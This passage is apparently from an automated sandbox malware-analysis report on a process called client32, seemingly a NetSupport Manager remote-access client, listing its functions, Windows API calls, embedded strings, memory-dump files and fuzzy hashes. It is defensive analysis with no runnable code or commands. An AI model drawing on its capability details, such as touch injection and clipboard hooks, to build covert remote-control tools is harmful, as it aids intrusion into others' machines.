                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Text$Item$Window$Focus_strncatwsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2224985109-0
                                                                                                                                                                                • Opcode ID: 87a84f66053d289a190ec780b1f0166db726f766f4f9bc40801a2379b985fe78
                                                                                                                                                                                • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                                                                                                                                • Opcode Fuzzy Hash: 87a84f66053d289a190ec780b1f0166db726f766f4f9bc40801a2379b985fe78
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                                                                                                                                Function 110EF790 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3489003387-0
                                                                                                                                                                                • Opcode ID: 54d0fd0ec22e0c19daa58ae9a99d699792ba2e8605e12db570be9bd55b6cd7fc
                                                                                                                                                                                • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                                                                                                                                • Opcode Fuzzy Hash: 54d0fd0ec22e0c19daa58ae9a99d699792ba2e8605e12db570be9bd55b6cd7fc
                                                                                                                                                                                • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                                                                                                                                Function 11043240 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 244COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MetricsSystem$__wcstoi64
                                                                                                                                                                                • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                                                                                                                • API String ID: 4229384801-710950153
                                                                                                                                                                                • Opcode ID: 1f06a1f18c9e0e445649ad1a31299ac57773d8bb4bd152755acd8f5b0cf6673c
                                                                                                                                                                                • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f06a1f18c9e0e445649ad1a31299ac57773d8bb4bd152755acd8f5b0cf6673c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                                                                                                                Function 110717D0 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,2520CF5D,?,?,?), ref: 11071824
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?), ref: 11071838
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 110719B1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                                                                                                                • API String ID: 624642848-3840833929
                                                                                                                                                                                • Opcode ID: 79469fc5a92d1921115a7ff5dc88552d2cd12deaf00613b7c7c47b554c47e63c
                                                                                                                                                                                • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
                                                                                                                                                                                • Opcode Fuzzy Hash: 79469fc5a92d1921115a7ff5dc88552d2cd12deaf00613b7c7c47b554c47e63c
                                                                                                                                                                                • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                                                                                                                                Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1111A32B,110CC170,00000000), ref: 110CEF41
                                                                                                                                                                                  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                                                                                                                  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                                                                                                                  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                                                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 2470273305-2830328467
                                                                                                                                                                                • Opcode ID: dd8189031de8f177b2097b55b8c55d9a398335e80a7e54ed3da832cefd627219
                                                                                                                                                                                • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                                                                                                                • Opcode Fuzzy Hash: dd8189031de8f177b2097b55b8c55d9a398335e80a7e54ed3da832cefd627219
                                                                                                                                                                                • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                                                                                                                Function 1101D720 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
                                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 1101D7BB
                                                                                                                                                                                • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 1101D7FB
                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 1101D802
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Class$CreateDestroyInfoRectRegister
                                                                                                                                                                                • String ID: NSMChatSizeWnd
                                                                                                                                                                                • API String ID: 691703853-4119039562
                                                                                                                                                                                • Opcode ID: 901251c8e42b063e64227bdd3a4b050327bda5f90c107ead69dc71cb3656fc04
                                                                                                                                                                                • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                                                                                                                                • Opcode Fuzzy Hash: 901251c8e42b063e64227bdd3a4b050327bda5f90c107ead69dc71cb3656fc04
                                                                                                                                                                                • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                                                                                                                                Function 11033470 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97registryclipboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 11033534
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • _memmove.LIBCMT ref: 1103357E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_memmovewsprintf
                                                                                                                                                                                • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                                                                                                                                • API String ID: 3274665941-228067302
                                                                                                                                                                                • Opcode ID: d10f336efbf75928146f0b312e3633070f555b5bd667046fb859355b3bdb151b
                                                                                                                                                                                • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                                                                                                                                • Opcode Fuzzy Hash: d10f336efbf75928146f0b312e3633070f555b5bd667046fb859355b3bdb151b
                                                                                                                                                                                • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                                                                                                                                Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(?,?,?,110710F9), ref: 11110928
                                                                                                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(?), ref: 11110935
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                                                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                                                                                                                • IsWindow.USER32(?), ref: 1103D17E
                                                                                                                                                                                • SendMessageA.USER32(?,0000004A,00010446,00000492), ref: 1103D1B8
                                                                                                                                                                                • _free.LIBCMT ref: 1103D1BF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                                                                                                                • String ID: Show16
                                                                                                                                                                                • API String ID: 625148989-2844191965
                                                                                                                                                                                • Opcode ID: d2ad410a3e8c184e69eaf3c54130ed802e68add3c7f1276a1a4eed83abcf6287
                                                                                                                                                                                • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                                                                                                                • Opcode Fuzzy Hash: d2ad410a3e8c184e69eaf3c54130ed802e68add3c7f1276a1a4eed83abcf6287
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                                                                                                                Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110D1540: wvsprintfA.USER32(?,11195264,?), ref: 110D1572
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                                                                                                                                • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                                                                                                                                • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                                                                                                                                • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                                                                                                                                • IsA(), xrefs: 1100968D, 110096B5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
